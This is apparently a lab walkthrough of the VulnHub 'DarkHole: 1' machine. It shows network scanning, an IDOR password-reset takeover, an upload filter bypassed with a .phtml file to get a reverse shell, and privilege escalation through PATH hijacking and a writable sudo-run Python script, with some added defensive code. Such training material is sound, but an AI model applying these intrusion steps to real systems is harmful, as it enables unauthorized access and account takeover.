DARKHOLE: 1

About Release
Name: DarkHole: 1
Date release: 18 Jul 2021
Author: Jehad Alqurashi
Series: DarkHole

Download

DarkHole.zip (Size: 2.9 GB)
Download (Mirror): https://download.vulnhub.com/darkhole/DarkHole.zip
Download (Torrent): https://download.vulnhub.com/darkhole/DarkHole.zip.torrent (Magnet)

Walkthrough

1. First, network discovery (you can't pentest a host whose IP you don't even know ( •̀ ω •́ )✧):

root@debian:~# nmap -sP 192.168.129.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2022-01-20 04:41 EST
Nmap scan report for 192.168.129.1
Host is up (-0.20s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.129.2
Host is up (-0.18s latency).
MAC Address: 00:50:56:F9:44:87 (VMware)
Nmap scan report for 192.168.129.146
Host is up (0.00022s latency).
MAC Address: 00:0C:29:A8:D2:BC (VMware)
Nmap scan report for 192.168.129.254
Host is up (0.00022s latency).
MAC Address: 00:50:56:E9:6E:9B (VMware)
Nmap scan report for 192.168.129.134
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 10.92 seconds
root@debian:~# 

2. We found the target host: 192.168.129.146. Let's probe which ports it has open:

root@debian:~# nmap -A 192.168.129.146

Starting Nmap 7.40 ( https://nmap.org ) at 2022-01-20 04:44 EST
Nmap scan report for 192.168.129.146
Host is up (0.00064s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: DarkHole
MAC Address: 00:0C:29:A8:D2:BC (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.40%E=4%D=1/20%OT=22%CT=1%CU=34940%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=61E92F0D%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4
OS:ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1
OS:=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O
OS:=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N
OS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms 192.168.129.146

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.97 seconds

3. Ports 22 and 80 are open. Let's look at port 80.
(PS: vulnerabilities in SSH itself that give a shell directly are rare, so our main target is the website.)

4. Press Ctrl+U to check whether the page source contains anything interesting.

5. There is a login page, login.php.

6. The usual "universal password" injection strings didn't log us in, so let's try registering an account instead.

7. Log in with the account we registered.

8. There is no file-upload feature, but there is a password-reset function.
Let's try resetting the password and watch the network traffic with F12 (the browser's developer tools).

9. The POST data submitted during the password reset is:

POST /dashboard.php?id=2 HTTP/1.1
Host: 192.168.129.146
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://192.168.129.146
Connection: keep-alive
Referer: http://192.168.129.146/dashboard.php?id=2
Cookie: PHPSESSID=2saleoclkkmpoj8rug707qolf6
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

password=admin%40123&id=2

10. The POST body contains id=2. Let's change it to id=1 and see whether we can reset another user's password.

11. The response is 200, and judging from the content the reset succeeded.

12. Let's try the admin username, which 99.99% of developers create, and log in with the password we just reset.
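The reset handler as steps 9 to 12 imply it behaves, beside a fixed version that takes the account from the server-side session, demands the current password, and logs a foreign id as an anomaly. This is an added illustration, not the site's PHP (which the post never shows); the User/FakeDB classes, the account ids and every password value are constructed stand-ins.

```python
from dataclasses import dataclass, field


@dataclass
class User:
    id: int
    name: str
    password: str  # plaintext only to keep the demo short; real code stores a hash


@dataclass
class FakeDB:
    users: dict = field(default_factory=dict)

    def set_password(self, user_id, new_password):
        self.users[user_id].password = new_password


def build_db():
    """Two accounts: the admin (id 1) and the account we registered (id 2)."""
    db = FakeDB()
    db.users[1] = User(1, "admin", "initial-admin-pw")  # constructed value
    db.users[2] = User(2, "test", "test123")            # constructed value
    return db


def reset_vulnerable(session, form, db):
    """Picks the account from the `id` field of the POST body, so a user
    logged in as id 2 can send id=1 and overwrite the admin's password."""
    if "user_id" not in session:
        return 401
    db.set_password(int(form["id"]), form["password"])
    return 200


def reset_fixed(session, form, db, audit_log):
    """Takes the account from the server-side session only, requires the
    current password, and records any attempt to pass a foreign id."""
    if "user_id" not in session:
        return 401
    me = session["user_id"]
    if form.get("id") not in (None, str(me)):
        audit_log.append(f"user {me} submitted id={form['id']} on password reset")
    if form.get("current_password") != db.users[me].password:
        return 403
    db.set_password(me, form["password"])
    return 200
```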
13. The login succeeded, and the page has a file-upload feature.
Let's upload an image file first.
(PS: sometimes a site's back-end upload function is simply broken and rejects everything, valid or not, so always upload a normal file first to confirm that uploading works at all.)

14. The upload succeeded; now let's try uploading phpinfo.php.

15. The site says only files with a jpg, png or gif extension may be uploaded. Let's upload a file with a txt extension to see whether that is really enforced.

16. The txt file uploaded successfully too.
So far we know that files with a php extension are refused,
but without uploading a PHP file we can't execute code and get a webshell...
Ugh, life in security is hard `(>﹏<)′
Let's ask the all-knowing Baidu.

17. PHP has other commonly used extensions:
php3, pht, phtml, phps
Let's test them one by one.

18. Testing shows that only the phtml extension is executed as PHP.
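Why the filter in steps 14 to 18 fails, as an added example (not the box's code, which the post does not show): refusing .php while accepting .txt is a blocklist, and Ubuntu's Apache PHP module config hands any name matching `.+\.ph(ar|p|tml)$` to the PHP handler, which is exactly why .phtml ran and .php3/.pht did not. The hardened check allowlists the final extension, verifies the content signature, and stores the file under a server-generated name; the blocklist function is a model of the observed behaviour, not the site's real code.

```python
import os
import re
import secrets

# Pattern from Ubuntu's php7.x.conf for Apache: names it matches are executed as PHP.
_APACHE_PHP_HANDLER = re.compile(r".+\.ph(ar|p|tml)$")

IMAGE_ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif"}
# Leading bytes of each allowed format (well-known signatures, listed here by hand).
MAGIC = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
         ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}


def apache_runs_as_php(filename):
    """Would Apache with that config execute this stored filename as PHP?"""
    return _APACHE_PHP_HANDLER.match(filename) is not None


def blocklist_check(filename):
    """Models the observed behaviour: '.php' is refused, anything else
    (txt, phtml) is accepted."""
    return os.path.splitext(filename)[1].lower() != ".php"


def allowlist_check(filename, data):
    """Hardened check: the final extension must be an image type and the
    content must begin with that type's signature."""
    ext = os.path.splitext(filename)[1].lower()
    return ext in IMAGE_ALLOWLIST and data.startswith(MAGIC[ext])


def stored_name(filename, data):
    """Server-generated name for an accepted upload, or None if rejected.
    Discarding the user's filename removes the extension trick entirely."""
    if not allowlist_check(filename, data):
        return None
    return secrets.token_hex(16) + os.path.splitext(filename)[1].lower()
```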
19. Upload php-reverse-shell-1.0 to get a reverse shell.

20. Use python3 to upgrade to a proper bash environment:

$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@darkhole:/$

21. Use find to look for files that could be used for privilege escalation (setuid binaries owned by root):

www-data@darkhole:/$ find / -user root -perm -4000 2> /dev/null
find / -user root -perm -4000 2> /dev/null
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/mount
/home/john/toto
/snap/snapd/14295/usr/lib/snapd/snap-confine
/snap/snapd/12398/usr/lib/snapd/snap-confine
/snap/core18/2284/bin/mount
/snap/core18/2284/bin/ping
/snap/core18/2284/bin/su
/snap/core18/2284/bin/umount
/snap/core18/2284/usr/bin/chfn
/snap/core18/2284/usr/bin/chsh
/snap/core18/2284/usr/bin/gpasswd
/snap/core18/2284/usr/bin/newgrp
/snap/core18/2284/usr/bin/passwd
/snap/core18/2284/usr/bin/sudo
/snap/core18/2284/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2284/usr/lib/openssh/ssh-keysign
/snap/core18/2074/bin/mount
/snap/core18/2074/bin/ping
/snap/core18/2074/bin/su
/snap/core18/2074/bin/umount
/snap/core18/2074/usr/bin/chfn
/snap/core18/2074/usr/bin/chsh
/snap/core18/2074/usr/bin/gpasswd
/snap/core18/2074/usr/bin/newgrp
/snap/core18/2074/usr/bin/passwd
/snap/core18/2074/usr/bin/sudo
/snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2074/usr/lib/openssh/ssh-keysign
/snap/core20/1270/usr/bin/chfn
/snap/core20/1270/usr/bin/chsh
/snap/core20/1270/usr/bin/gpasswd
/snap/core20/1270/usr/bin/mount
/snap/core20/1270/usr/bin/newgrp
/snap/core20/1270/usr/bin/passwd
/snap/core20/1270/usr/bin/su
/snap/core20/1270/usr/bin/sudo
/snap/core20/1270/usr/bin/umount
/snap/core20/1270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1270/usr/lib/openssh/ssh-keysign

22. /home/john/toto looks usable for privilege escalation; let's run it:

www-data@darkhole:/$ /home/john/toto
/home/john/toto
uid=1001(john) gid=33(www-data) groups=33(www-data)
www-data@darkhole:/$

23. It appears to run the id command with john's privileges.
Let's set up a malicious PATH and see whether we can obtain john's privileges:

www-data@darkhole:/$ cd /tmp
cd /tmp
www-data@darkhole:/tmp$ echo "/bin/bash" > id
echo "/bin/bash" > id
www-data@darkhole:/tmp$ chmod a+x id
chmod a+x id
www-data@darkhole:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@darkhole:/tmp$

24. Run /home/john/toto:

www-data@darkhole:/tmp$ /home/john/toto
/home/john/toto
john@darkhole:/tmp$ whoami
whoami
john
john@darkhole:/tmp$

25. We now have john's privileges. Let's see what's in the current user's home directory:

john@darkhole:/tmp$ cd /home/john
cd /home/john
john@darkhole:/home/john$ ls -al
ls -al
total 72
drwxrwxrwx 5 john john      4096 Jan 20 09:37 .
drwxr-xr-x 4 root root      4096 Jul 16  2021 ..
-rw------- 1 john john      1722 Jul 17  2021 .bash_history
-rw-r--r-- 1 john john       220 Jul 16  2021 .bash_logout
-rw-r--r-- 1 john john      3771 Jul 16  2021 .bashrc
drwx------ 2 john john      4096 Jul 17  2021 .cache
drwxrwxr-x 3 john john      4096 Jul 17  2021 .local
-rw------- 1 john john        37 Jul 17  2021 .mysql_history
-rw-r--r-- 1 john john       807 Jul 16  2021 .profile
drwxrwx--- 2 john www-data  4096 Jan 20 08:49 .ssh
-rwxrwx--- 1 john john         0 Jan 20 09:38 file.py
-rwxrwx--- 1 john john         8 Jul 17  2021 password
-rwsr-xr-x 1 root root     16784 Jul 17  2021 toto
-rw-rw---- 1 john john        24 Jul 17  2021 user.txt
john@darkhole:/home/john$

26. Look at user.txt:

john@darkhole:/home/john$ cat user.txt
cat user.txt
DarkHole{You_Can_DO_It}
john@darkhole:/home/john$

27. Look at password.
It gives the password root123:

john@darkhole:/home/john$ cat password
cat password
root123
john@darkhole:/home/john$

28. Look at file.py:

john@darkhole:/home/john$ cat file.py
cat file.py

john@darkhole:/home/john$

29. Check which commands the current user can run with sudo:

john@darkhole:/home/john$ sudo -l
sudo -l
[sudo] password for john: root123

Matching Defaults entries for john on darkhole:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on darkhole:
    (root) /usr/bin/python3 /home/john/file.py
john@darkhole:/home/john$

30. It runs /usr/bin/python3 /home/john/file.py as root,
so write Python code into /home/john/file.py to get a shell:

john@darkhole:/home/john$ echo "import pty;pty.spawn('/bin/bash')" > /home/john/file.py
"import pty;pty.spawn('/bin/bash')" > /home/john/file.py
john@darkhole:/home/john$ sudo /usr/bin/python3 /home/john/file.py
sudo /usr/bin/python3 /home/john/file.py
root@darkhole:/home/john# whoami
whoami
root
root@darkhole:/home/john#
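The two escalation paths in steps 21 to 30 (a setuid binary sitting in a home directory, and a sudo rule that runs an interpreter on a script the invoking user can rewrite) can be spotted from the command output the post already shows. The audit below is an added example, not part of the original post; the trusted-prefix list and the interpreter set are assumptions, and the sample strings are abbreviated copies of the post's own output.

```python
import os
import re

# Packaged setuid binaries live under these prefixes; /home/john/toto does not.
TRUSTED_SUID_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/snap/")
INTERPRETERS = {"python", "python2", "python3", "perl", "ruby", "sh", "bash"}

# Abbreviated samples copied from the post's own output (steps 21, 25, 29).
SUID_SAMPLE = "/usr/bin/sudo\n/usr/bin/passwd\n/home/john/toto\n/snap/core20/1270/usr/bin/su\n"
LS_SAMPLE = ("-rwxrwx--- 1 john john         0 Jan 20 09:38 file.py\n"
             "-rwsr-xr-x 1 root root     16784 Jul 17  2021 toto\n")
SUDO_SAMPLE = "    (root) /usr/bin/python3 /home/john/file.py\n"


def suspicious_suid(find_output):
    """Setuid paths from `find / -perm -4000` output that sit outside system dirs."""
    paths = [ln.strip() for ln in find_output.splitlines()]
    return [p for p in paths if p.startswith("/") and not p.startswith(TRUSTED_SUID_PREFIXES)]


_LS_RE = re.compile(r"^([-dl][rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(\S+)$")


def parse_ls_dir(listing, directory):
    """Map each `ls -al` entry to (mode, owner, group), keyed by full path."""
    files = {}
    for line in listing.splitlines():
        m = _LS_RE.match(line.strip())
        if m:
            mode, owner, group, name = m.groups()
            files[os.path.join(directory, name)] = (mode, owner, group)
    return files


def writable_by(mode, owner, group, user, user_groups):
    """Classic rwx check: owner bits if owner, else group bits, else other bits."""
    if user == owner:
        return mode[2] == "w"
    if group in user_groups:
        return mode[5] == "w"
    return mode[8] == "w"


_RULE_RE = re.compile(r"^\s*\((\S+)\)\s+(\S+)\s*(.*)$")


def risky_sudo_rules(sudo_l_output, files, user, user_groups):
    """sudo rules that run an interpreter on a script `user` can rewrite."""
    risky = []
    for m in filter(None, map(_RULE_RE.match, sudo_l_output.splitlines())):
        runas, cmd, args = m.groups()
        script = args.split()[0] if args else None
        if os.path.basename(cmd) in INTERPRETERS and script in files \
                and writable_by(*files[script], user, user_groups):
            risky.append((runas, cmd, script))
    return risky
```

Running `risky_sudo_rules(SUDO_SAMPLE, parse_ls_dir(LS_SAMPLE, "/home/john"), "john", {"john"})` flags the file.py rule for john but not for www-data, and `suspicious_suid(SUID_SAMPLE)` returns only /home/john/toto.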

Root access obtained. Young one, you've successfully taken down a server. Congratulations!!!
